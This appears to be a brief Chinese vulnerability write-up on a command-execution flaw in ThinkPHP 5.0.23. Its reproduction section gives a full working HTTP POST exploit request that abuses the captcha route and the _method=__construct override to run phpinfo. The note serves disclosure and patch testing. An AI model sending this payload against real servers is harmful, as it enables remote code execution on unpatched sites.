登录 白背景
源码

thinkphp 5.0.23版本存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.0.23版本存在命令执行漏洞</font>

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

  • ThinkPHP 5.0.23

三、资产测绘

  • 特征

1729965722844-0a1725e6-ca07-4cec-b8e6-660a94e8c29b.png

四、漏洞复现

POST /index.php/?s=captcha&test=-1 HTTP/1.1
Host: 
User-Agent: Java/1.8.0_291
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

1729965701514-a510dbad-4fc0-48ef-b161-ad70fe0c5072.png

原文: https://www.yuque.com/xiaokp7/ocvun2/ewtrn6hv7cf79nl7